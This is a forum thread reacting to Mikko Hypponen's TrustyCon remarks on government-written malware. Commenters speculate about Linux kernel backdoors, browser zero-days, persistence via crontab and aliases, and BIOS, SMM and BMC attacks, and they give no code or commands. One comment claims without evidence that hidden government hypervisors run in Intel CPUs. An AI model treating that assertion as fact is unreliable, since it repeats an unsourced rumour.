"A surprising number of governments are now deploying their own custom malware and the end result could be chaos for the rest of us, F-Secure's malware chief Mikko Hypponen told the TrustyCon ( https://www.trustycon.org/ ) conference in San Francisco on Thursday.
'Governments writing viruses: today we sort of take that for granted but 10 years ago that would have been science fiction,' he told the public conference. 'If someone had come to me ten years ago and told me that by 2014 it will be commonplace for democratic Western governments to write viruses and actively deploy them against other governments, even friendly governments, I would have thought it was a movie plot. But that's exactly where we are today.'
http://www.scmagazine.com/trustycon-malware-expert -mikko-hypponen-kicks-off-conference-on-trust/arti cle/336089/"
there may be lots of different distributions and configurations, but the kernel is a common weak point (single point of failure).and torvalds is only one human living in the united states... he is not immune from manipulation by the government (i hear waterboarding can be convincing)
True. But unless the kernel is vulnerable to a remote exploit, then almost certainly the delivery mechanism that would work for you wouldn't work for me.
Doctor: "Do you hear voices?"
Me: "Only when my bluetooth is charged."
probably, but i doubt most linux users would review kernel source changes before updating, so if torvalds opted to insert some kind of remote exploit into the kernel (thanks to some friendly "enhanced interrogation" techniques) most would have no idea. a lot would, particularly the core kernel devs, but no doubt they would be targeted too in that scenario.
The malware is in the hardware microcode. No amount of OS safeguarding will prevent a government organization taking over the hypervisor you never knew was running on your Intel CPU.
I'm interested to know more, if you have any reference material. I checked the links in TFS, but didn't find anything. I'm about to buy a new laptop, and full virtualization support in the CPU is one of my requirements. Unfortunately, there isn't much available with an AMD chip these days, not even in the custom laptops I've looked at.
there may be lots of different distributions and configurations, but the kernel is a common weak point (single point of failure).
Not only that, but the core userland is pretty much the same stuff across Linux distros, with minimal customization.
It would be an incredibly lucky coincidence if those slight distro-specific tweaks would somehow end up neutralizing the exact piece of malware to reach your machine.
The kernel isn't the single point of failure that you think. Just because I might run Debian doesn't mean that I am necessarily running a kernel packaged and released by Debian. We can, and some of us do, "roll out own" kernels. An exploit that exists on one Debian box, may not exist on another Debian box. And, of course, there are differences between distros. The paranoid who compiles all of his own software from source may share some vulnerabilities with the larger community, or he may even introduce some unique vulnerabilities, but you can't count on much or anything.
And you don't need to infect the kernel at all. All you need are "zero days" on common browsers/clients(IM etc) or common plugins (many Governments can MITM you if you're in their territory or they really really want to). Then the malware gets in and sets itself up to keep running - at, crontab, sneaky aliases, etc.
Very few Linux users run their browsers using other accounts or sandbox their browsers (and do check if your sandbox is tight enough for such a scenario - the last I checked years ago Ubuntu's default apparmor browser sandbox was rather loose- but I've given up on Ubuntu for desktop stuff any more so I'm not bothered).
So even if kernel or privilege escalation exploits would be nice, there's no need in most cases. The user's stuff- email, keys, IM, browser cache (for frame jobs and other stuff), etc would all be accessible already.
There may be lots of different distros and configuration but in my experience writing cross platform stuff for linux and unix platforms (BSD, Solaris, AIX etc) a perl script can cope with most of that (one issue is SSL support across all those distros, but if you don't care about encrypting all your channels with SSL that's not a big problem- and even then there are usually workarounds with cli http clients).
TIMTOWTDI is great for writing malware too ;).
The kernel isn't as interesting as it used to be. Getting the BIOS to run an exploit inside SMM or the BMC would be more interesting. Some BMCs have a JTAG connection to the system. This is especially dangerous since the BMC shares the main system's network port.